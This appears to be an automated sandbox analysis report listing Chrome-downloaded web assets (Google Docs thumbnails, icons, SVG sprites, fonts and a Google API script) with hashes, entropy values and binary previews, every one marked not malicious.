                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlFeX_nH9koWhIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                                                                                                                                                        Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75590
                                                                                                                                                                                                                                        Entropy (8bit):7.98843737585609
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9HeDt4yMOxAAWK6IrCderXSrNQbN9BGh+X8fEv9:9H+TxAGDaeWrN+5e+++9
                                                                                                                                                                                                                                        MD5:252166C1202B3C942B6B3F26E594A79A
                                                                                                                                                                                                                                        SHA1:B71540AA2B6050DDD7693F0237CAC8008325C08E
                                                                                                                                                                                                                                        SHA-256:79DB9814D595FE5592D8184F57EC0B3476628CBBB7B5A549BA70FFA7B6F2F6FA
                                                                                                                                                                                                                                        SHA-512:8BA3289BD5963A3D21A8D9374C47B02F11486624FF01CB856290586141693166EFCA5D5FC52CCCB000E9CC1E6B49B315C9D4CD8D454626536EA17997F0F5A862
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..'.IDATx......... ...9>!.)..).......`+,.a..gV.-..#BY..133.#......f...3<7.<3333.gwUJ..J.s..o...].*I)EJ......+o..$.dUe..|..`..!...B....}..K..m.X6.7~..W.t.;.......?...o...K.k......k0...(..X.*...26.I..1.h....Xe.9g.XpU...3.....N..+..0.(_D.s...m....$N.U..0.-l..3Kt..../........PU...?...FU.&C....Z..@.g.D...=.s>.VU..`f. ..G.d{.@?(n....=.R.=..T.}O;.$2s..S..<..."y!$..3..U..y..}..+..}..V..Z....O.[I...._?.....*...\..q....9..CQU...O....c..[...{.[[.:D.,...c..=C.M.}...a....=.aDT..N..9?*... .vf.hp...;.IG....|i..|.'}...(..4 q...........x...].gTD..N.s.}H.t+/H..F.....[.....> .+.._..._....'N...e.....}.c.<...pc+-~....qd.........x.X..s.d.....81g.......V....ovj.BV?......x...a.....:.S.U..mQ.1%=c.9...9+...d.$.J.qX..'..` .m....`....<.....v.mg.1...@f...!.UX.\'z.....)~...g......;~n.X=....g&O.U...z$..B.].....$W...n{Y7....zI.q..6.jI.q.~.nY....@......}i=T'l..0....1&-p.K........9d.{..;.1....j.].+i.)...{.$[U.q.9..=^:.Tmc....W..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):24291
                                                                                                                                                                                                                                        Entropy (8bit):2.9545368105511347
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TDtLe7tZYTn7CNOAMUFuIuV///b//3///k//u//+///3q///NtLNhesjfXKzgE:0gfCN9F0AG7eIazT
                                                                                                                                                                                                                                        MD5:05F2F2059412502B0CF2140369A01612
                                                                                                                                                                                                                                        SHA1:ED998506B18948CBD20A4C7103199A10CF723922
                                                                                                                                                                                                                                        SHA-256:3D45292EEF3C671FCAFB8CE679C08FCCED09A3835E46F9ED51C7FA9AF2E0E11F
                                                                                                                                                                                                                                        SHA-512:E337A5A29179ACD05347D125AF5DA24813238E94736F403A18131B0C97E32A17C9F5B667173BA8DE2297B37067D0FDCA306A6CF4EAE2892923661F42994C0982
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/documents/images/kix-favicon-2023q4.ico
                                                                                                                                                                                                                                        Preview:............ .h...F... .... .........@@.... .(B..V......... .e...~W..(....... ..... ..........................B`.B..B..B..B..B..B..B..B..B..B..B..B..B..B..B`.B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..............................B..B..B..B..B..B..B..B..B..............................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..........................................B..B..B..B..B..B..........................................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..........................................B..B..B..B..B..B..........................................B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..B..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):27134
                                                                                                                                                                                                                                        Entropy (8bit):4.949493419733994
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:G5Cj0WN9Oe/bMZ0oEQSERgPtuLCnulPmo8MADYyY/AXVRdB6j0T5D7ZVQR:GkOT0onfgPtfuwMFyY/ZC7G
                                                                                                                                                                                                                                        MD5:3EFE1C5EB7CC2EF3419BF71B650479B5
                                                                                                                                                                                                                                        SHA1:B7E11B6A8304285BDB9528B3E5707FDCC4441A70
                                                                                                                                                                                                                                        SHA-256:7D24D331406734568514DFE0510CB86244FBD402809150576A94B8F93ECDBF43
                                                                                                                                                                                                                                        SHA-512:19102F6AA0344C320D2D0C42C479E88B9119915DEF3E1BED4AFDEC7154C581DC0852E9BDA29E6DBC6DC40EB32D71F5328A0C22CED21ACA1E8C502F4F450359E7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/documents/share/images/sprite-24.svg
                                                                                                                                                                                                                                        Preview:<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0" y="0" width="29px" height="1049px" viewBox="0 0 29 1049" preserveAspectRatio="none"><g transform="translate(0,308)"><rect fill="#4387FD" fill-opacity="0" width="21" height="21"/>.<polygon fill="#999999" points="15.5,7.414 14.085,6 10.5,9.586 6.914,6 5.5,7.414 9.085,11 5.5,14.586 6.914,16 10.5,12.414 14.085,16 15.5,14.586 11.914,11 "/>.</g><g transform="translate(0,281)"><g xmlns:sketch="http://www.bohemiancoding.com/sketch/ns" id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">. <g id="Artboard-1" sketch:type="MSArtboardGroup">. <g id="Oval-26-+-ic_link_24px-3" sketch:type="MSLayerGroup">. <circle id="Oval-26" fill="#558B2F" sketch:type="MSShapeGroup" cx="12" cy="12" r="12
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19353
                                                                                                                                                                                                                                        Entropy (8bit):7.958319409321121
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:v2ay1fbP96Y6iG8xeWKJlYO8g9uAwMop4xITY:+VhTnhD7QMFTY
                                                                                                                                                                                                                                        MD5:EB8C32B7A11DD6F2F39C8A91165CCAD6
                                                                                                                                                                                                                                        SHA1:08EB841B35D7EA38CE68C2E60234113A92B0D900
                                                                                                                                                                                                                                        SHA-256:8C5E340716BDD5A1AB5E88E965C24F7B621429291B7B96D9CAB4705800D77081
                                                                                                                                                                                                                                        SHA-512:86279530BCC8D3B6D49601381313C0CA5A0A4CBF5D2AED359C372AD351D4734FF455D01AE50DBB8C7AB5B2ECA75387BD8B5ACC9F0A95B2325C3B116CA54A8F86
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..K`IDATx...1.....0.K...[.E.... ,.a........a...@X..... ,@X...h.. ,.a...(..9n.....(E.z.S..f.n..&;.`.....l6.3.......c.'......j...Qk,...Z..VS.U.l..i.o.::,!....Z..2+..u..:..!$...+..?..f.U.!$.....9...=......^O.5.!G.g.?.($n....n.:..,..JK.!a........ub..3,37.^.u.d..~r.N!........e..].!s...7...5yn..n.....,..e.YB.........\4..".J.am.}7...C.v......x..U.W._..<.x..T.",.E.!$....k..s.3...N.+...-,"..?..y9....U...B.*..!...M.p..3.M....mX(...[~pM./.v.jI..C...~F..q..Vf..*...VCK/n.&.w$...oM.L..C.&...\HYC......,.-BU....\NS.U.`..Z.}ZJ.fK.!..%.....BHXB..K.!$,!........BHXB.!a.!$,!.....B..........VO....._....;...+++.4h.k?..S.....g.F.....B.....k..;F~....~`W...vx5|..k.Z.E.!aEGG;+.%..3B......!C>.....f{....f..EX....w..7n.....Y.f].|.r 11q..C...../....T.........L.E.....0Q...9..G.........;3g....~7e.[.nq.l_QQ...F..S....,X.?...^.ju.>O.<9m.4...I.o...3..]..g....Ul....!...pT....#.....X.......|..W...+...-."...%...N.).bbb.9~..........A(.-C...=k;
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):46075
                                                                                                                                                                                                                                        Entropy (8bit):7.984118762106573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZwBQ2opPipAymIFto7EEZ1lYRzRXbm/OAiMul4cAcYt8uZ90uyne:ZwBBopqgZYzRrKOAAM8Mfye
                                                                                                                                                                                                                                        MD5:8CB626DFAFFFD6AADDFC69748507239E
                                                                                                                                                                                                                                        SHA1:49E3EFCA4C30967FBFC26E36A66CEC676D35FC78
                                                                                                                                                                                                                                        SHA-256:C729C1A9CBC6269F50F5DF4D32B3F87D4E6B227BA546FA2537D44CA51ED536F6
                                                                                                                                                                                                                                        SHA-512:7546722D7B673EDB55524F2F3E330D9095A6A2D9E35FE1ACF478C8B6E1FCF00E3BA1D7B9EA6C60E40C717AA6F0B8ABE490382EA4CB2B77468A37B4D104E26F5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1y3NmcIjp3rSsNJ5rJhgwvt-hhSNP8mcHVt0ExCev804_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx................0=. ,@X..... ,.a....f.\G...?...a<f......13C6v....:ff.+.0.3.~.,+z5.%....G.....4..o.#....k.[4.K..kr........h.cj..5.1...M.+.&....F...S.....q6...[F.8}L!...V....X]}{_......U..-..++'UW3N.Be%m..S(..m.Vk.2.D.im..;.;.d....m>.-?:...X.......U...O....L.......I...n.\[3....`.w.I.c......gs8d.YSjk.*g...4.j......b.AVw...o..B..Bq....b......^,v..cBg...{...Y4/..).......+...8.._...5"..0..D.ZH}|.C7.5.b!(#.l$<e.......>.. .hY.EW.rC./.e....k....[........'.y.!_..v...J3...07..~w.x:..........>......!...|.w...`..d.M|..SZG....).........}..b.....a....D;....tN46.5..........j"..f.........p..f|..-..).,...cZ..}...vN..O|....`P..{.....CLy...h.;f.[g.... rbe...s.m..4.S.CP.<...%.BD1d......:b1-..............i.C#.hC6>........]...,...a...r.... @j..(X..X.N+9.E%._qD.]2|.O{>P.b.....K........V.=.4.[d...!.7P...hF......vbk>........K.*........#w..u.....<.....F..S..Y...D`...w..D44..a..o....U..@...o....-O(V<...........f.0
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87803
                                                                                                                                                                                                                                        Entropy (8bit):7.995938745494088
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:IXRFs3n1Ive1APS/KP3eCG+3j0V9K5MpxFRS6tX6xm4hHiWrhr:I6FIve1Q8Kf5G+AXpxFRS6AUehr
                                                                                                                                                                                                                                        MD5:73A461CC50B98AF30026F1795678AD80
                                                                                                                                                                                                                                        SHA1:9B0467D961807075CF95D9BA88887AE07439E996
                                                                                                                                                                                                                                        SHA-256:9CA380C26A8CA41830B0102893B2838201B357DA52E3BEFF5E074FAF6A868229
                                                                                                                                                                                                                                        SHA-512:93F34505BFE843A2DB30CBB31197B26951EB5C9B905357468AFFBDFA9BDB17F18EF7715AA9A740F6E9BB6C0999403AAD4B99E60EE79A4748CC3613A601C7A0B1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..V.IDATx...A.....0.Q..O.O..b%..Q.@X...r.. ,.a..rf.M3yk...@.Y...C.O.'.s..61.]-.C.....`H....i9...e..v..)......v(.}J..^..R.;9.9...j(=.VjX.&..QJ....M....G.v.......)b....r..9..n...f...n...3..u.z..v`...)1y.%...n.m^......a.%...9.N).'...H..S:....=.@R-...5j .-.(F.kiUr&w.1..`Q.r.!p$.....@....:G.H..e....\...e....lzci.!p|......(......i#.?.,.!....<....z.!G.....6...O.~}.M.,....l7..v.M!..W.&.5.C*.../.`S$.....V...,..8.S.K.....\'R..P) h'.........).........H.X..X.......t..a`...`.o.\.D.P."^...#.j.9pq...j......%y$B...zi....".^..!....;...)..V....*^.y........_......5.D....1.3..=k.!O.)utZ<...YC.]ATjq....!t.|'ff;......C.....15{~......Sk:3..o--.t.@U.s.._z.;..!*n.._^?./..W>..O}..Z8.f...e...'d.%z.`..h.6.E.D.y"%rP2.t. ..G;B...ef..-7...u...H3c.b.G..?...f.........8.Za.Ws..=.._.<..vL.@.....Y...}.jD.......^.!9,.....5../..Czd.2-.0...j..._../..!......c.eM..fGc.'.......{..r.l.`.r..Uke...../.-....;.\.|.....I....m.T....P.f.:.x....Y.6.....T..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 36840, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):36840
                                                                                                                                                                                                                                        Entropy (8bit):7.993562127658027
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:Vne728reVhZRDsdY38FWernlqO6oqd1/yc8Kmfd:VnmhrWZ6zhnjjqjyc6F
                                                                                                                                                                                                                                        MD5:3603078A7B178210AC17285E145B4A8C
                                                                                                                                                                                                                                        SHA1:D57FD925F10C47D039FCDA3CC8A2A12D23E134C5
                                                                                                                                                                                                                                        SHA-256:DCBAF64460B4DB78BA16EE6230D2C90215DDA58CE8C285348D624FE32DBC470E
                                                                                                                                                                                                                                        SHA-512:495F1BD5DE5FDBCB73865CBB3B5E966906E527E6E9204D62492F433BEB4E8E31F2934A64FADDF805E44A8488B36E8C98C12C70339177F6F10541331CA7F407D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/comfortaa/v45/1Pt_g8LJRfWJmhDAuUsSQamb1W0lwk4S4Y_LPrE.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............................................p...x..(.`?STAT*..6.....0..r..R..6.$.. . ..P..#..[]}...M...*...".l..U....Nn..@.T..$E.c.8...g.....oJ.2..........%U.B...yr.... )K.\saQvb.Q.8.B{r.y.I....!.c.SJ%.rN.$.kI.WB.../<.....i5x}.*.|a.km.YvB..jFHY%...I..S.k^L3..J.V[..:...ng.j.y......L....WJ.S..;Cg....N..oQ..O..E......c....|..V.........S...O{..7....~.......}x.[.1F.......I..}DR5.7q.|..."M.F..N.....P..%....B.q...P..I.^..fs....B...TO2...[]..csj$.<......$....}J.<v*O...Z[..w.5.q..G.! .-%i.".*..&b....`.*U"H....&.e.">a.r......=.....).Fjy...p...O.u.;@s.L....U.m}.lb...-e..."V~.........G......m......qm.n....).A.3.Y..x...@x...s.j3H...p.YS.w.p'..b...w.6..o[..M......!.....%<..x..C..&.k.XK.-.Z.*.z..k|...........nr......x.X*..q.........^....7X......K.I'..y{i...H.7$|.ka.._d.l.q..".l.?.*W...`H-Ja..."{..zF...H....!.SqX>2..!....)...-.....S.?":Qz.....]....;...\..-...t..h'[...s.p!x..3]........'^.]f......L4../%X..>?1.....A...,@.+.i..?%M-..C.{.J:........./..E...l..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):492346
                                                                                                                                                                                                                                        Entropy (8bit):4.5619110007692445
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:7ei3GES/c5UzaHm1PePqgbVMsHO5CWlsuWotSa/FWsmxXWS4KaXxWbyvL4wZ84bi:zAhUVc3H86iWoWZXhoB
                                                                                                                                                                                                                                        MD5:62606202635606B3D1FEF6207A65C375
                                                                                                                                                                                                                                        SHA1:1504EE1910621160729168CCFB27DA76A4A81C42
                                                                                                                                                                                                                                        SHA-256:3FFAF8940A447C9D229C3DA17F73D9A77A255741C9BF827F89387F8A41779DBB
                                                                                                                                                                                                                                        SHA-512:CDF1D437A11792299020631B9C0FEB54465E232130C1FE59A463E2C97E853DB92C71836F968E245855BEBA578F0EBED1C83EF1DCEAD90EAE453555CB037F8C79
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/common/material_common_sprite788_gm3_grey_medium.svg
                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1884" height="1368" x="0" y="0" preserveAspectRatio="none" version="1.1" viewBox="0 0 1884 1368"><path fill="#fff" d="M1207 986q-2.094 0-3.547-1.453T1202 981t1.453-3.547T1207 976q1.078 0 2.063.445c.984.445 1.218.722 1.687 1.274V976h1.25v4.375h-4.375v-1.25h2.625a3.65 3.65 0 0 0-1.367-1.375 3.7 3.7 0 0 0-1.883-.5q-1.563 0-2.656 1.094-1.095 1.093-1.094 2.656c.001 1.563.365 1.927 1.094 2.656q1.093 1.095 2.656 1.094 1.203 0 2.172-.687a3.63 3.63 0 0 0 1.36-1.813h1.312a4.93 4.93 0 0 1-1.782 2.703A4.85 4.85 0 0 1 1207 986"/><path fill="#444746" d="M1251 1250.8q-.988 0-1.862-.375a5 5 0 0 1-1.538-1.025 5 5 0 0 1-1.025-1.538 4.7 4.7 0 0 1-.375-1.862q0-1 .375-1.862a4.82 4.82 0 0 1 2.563-2.563 4.7 4.7 0 0 1 1.862-.375 4.6 4.6 0 0 1 1.862.375q.876.375 1.525 1.037.663.65 1.038 1.525a4.6 4.6 0 0 1 .375 1.863v.75q0 .687-.487 1.175a1.58 1.58 0 0 1-1.163.475 1.53 1.53 0 0 1-.788-.213 2 2 0 0 1-.6-.562 2.7 2.7 0 0 1-.812.575q-.45.2-.95.2a2.31 2.31 0 0 1-1.7-.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1437)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):117390
                                                                                                                                                                                                                                        Entropy (8bit):5.490758436358278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
                                                                                                                                                                                                                                        MD5:B52266FAD5115039E3806FF8DCD71F86
                                                                                                                                                                                                                                        SHA1:8007278E322C8EA9F3CB5B62008E3E3599E9F659
                                                                                                                                                                                                                                        SHA-256:E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
                                                                                                                                                                                                                                        SHA-512:58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0"
                                                                                                                                                                                                                                        Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 41676, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):41676
                                                                                                                                                                                                                                        Entropy (8bit):7.994510281376038
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:spGlqkWqlt2B+/4qgwfs/W4NoQBUVRwHseU9BNhS:sp+B5Ik45GwWorIEUDa
                                                                                                                                                                                                                                        MD5:C619C10C85CA3DD6D4B57CC59BA2A32A
                                                                                                                                                                                                                                        SHA1:92A0D8AC165CF6788BE6259F901FBA1994886D91
                                                                                                                                                                                                                                        SHA-256:C129C2C42B2F1D5AF9BD5B9858F0EBA8215EE3EBF61FBC99866E107B2C0AF4B5
                                                                                                                                                                                                                                        SHA-512:BEC65C9991CE74CED298E75A30369CFFE9D40F26B7EA10B7E16469D32AEDBA85889E063B2A571F0FB38B8E560F3CB26E7551A4FC6736F4EC2B6DBCE614E141A0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDFwmRTY.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............4...f..........................$......4.`?STATD..*...........6..6.$..^. ........[g......U..r.....+g...n.-..6H..'>K...;....+.v.......%.B.............U...<<.8jF.2.2|.)P..pcv8/q.h..r."....T....E@r.1;.$C.R.Zr.^..Vos....[...nJv..:..]..$.p7%Sb...QIt.q........I.:..".0=i1.p.,..fh...8...\.?..n.o...O.....7j..*....YC........H.W8."...c.....O=.....wjXy..`..,.T..[..$...w.....^....|...s....+.....Z....m..E...~.tl|6......:X..........20v...6V.x....M..K.6%.oD.m....F..<?.?....=V...#..R...Q.._...#b#V.....)*U&.T)!..PJ.....O.^.+y.c....AO..%I...r...g.....-Ff.0...;<?..........c.....1X.0b......3..T0...3...<E.......N.9-1.Y..=...#./.o...."u9.hl#T./D6....F."t..e.%,.s...&.#P..G..n..Y.*....X.N..._h.j..~..j..*W.$./.T.>.....e......S)..`...~......Z.c.p.q.P.HP..oO.}...2..R..(S.Ph.a..0.{.k...o".x...t2..tB...r.}g.<...otO.I.....Q...a.).......3p:S.$.......IB........!Ja%..=...36.......SD..+.T^%.k.m.u.W...3.9.L.p.?..'H.MK.`.. .v.]...(...u...(...c...r.|k.......i..]....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):92773
                                                                                                                                                                                                                                        Entropy (8bit):7.987030743964374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+C+IjJpAIJxICl5dinR9RYoNUt1iCEXFoKxEKPj2y9NZhRPEGpLbV7:F+IjJyIJyCl+R9RHNZcy9NvRXXV
                                                                                                                                                                                                                                        MD5:A37E6BCB3BBAE667BB10E301EA600586
                                                                                                                                                                                                                                        SHA1:F8202213741E7F499F0A91C4057896FA9795A578
                                                                                                                                                                                                                                        SHA-256:D2DB9743A1AA94579B7D08EBD1E89090E3859A06C289D788A0B14C869AB2C0A0
                                                                                                                                                                                                                                        SHA-512:5555ACD324B89E9FBA46D01347C6CA498B8EA6198D1B23E269114F193734BCF9BFFD822B4EA3D6F76D2926A12077F412C148B62BACCAFAF945511FE646DEA20A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..j,IDATx...1........_Y+.zB...G.... ,@X......@egH(.@.b.&/om[.m.8.m.{...m.....eL*.).:.*V..R.X....m...k../.....]?.....@....Io.....L.,.....B..q.....L.n2Yb..f...p.}.u9ecG....F\x.O....2)...J.?<#OYC...-.]..<.../...n..A...W..0.uw.n}..OzAN~.....I./&....?..h.5..2"&)...=........(+.......{~..t...4@,.... ......0`..Q..]}].\!i.o.KDV..........yd2y....|B...R.m..K.q8.....9sJ.....>.i$...TSSKa..h...0.......N{.B.R*...:...'...t.4..Z.EAN..Jn$.6"..*UUs...c.Z.C..;....23<........0..{.n7W.KJ.....?..N.a...q..HMn.dr....c7...^"c =|N../..........\.6......*....?r..k....|....+.fT.v.....,M....:K.z.2.....D....e:.1.J..Z.8I..Z$H~.K.Xk_d.p.....>{...}.R..i9...6...}.c....{o...B`x/.=.1s....@8........... z....}8.D.<.P5.g..[l...s&...nx.)......}fT2.@$...47..q.E..iI...@.._..Z...7.......}.>1.kr...n.y...~..z.....SS3{D,..KgZ...C.A..9.4IF"].v..}\.JU.5.h~~>.cD.kv}{...S._..@.UI......^........V.....3Z.4.V.....s..B".g...6.Q............cz.....Ks..;
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 41284, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):41284
                                                                                                                                                                                                                                        Entropy (8bit):7.995064975939542
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:cfG0KEtyj2eCaD4YcktFD3n2Eaxvgg6UOJ47dDNITDCJeFqtlBcCi1FWOLtgYmu5:cfG0KEAj2gD4YBFD32BbPdimectlBcPp
                                                                                                                                                                                                                                        MD5:87595E01EADD10489540C2BC9532C831
                                                                                                                                                                                                                                        SHA1:E3EA9372FC50308AFB080F0AA0C1B544873E7896
                                                                                                                                                                                                                                        SHA-256:BED2897761BB0A09F1993AB40B94D35B1E2B3C57039379B888503C6EAC7DCE70
                                                                                                                                                                                                                                        SHA-512:62B45A99DDDDAF13A857380714567ABA0386E2C0A8A89FB378C1123645F693FE4062F075D143B153021FF556F9235F76275F3D73DC79401FCCC29E405AB09F9F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTbtM.woff2
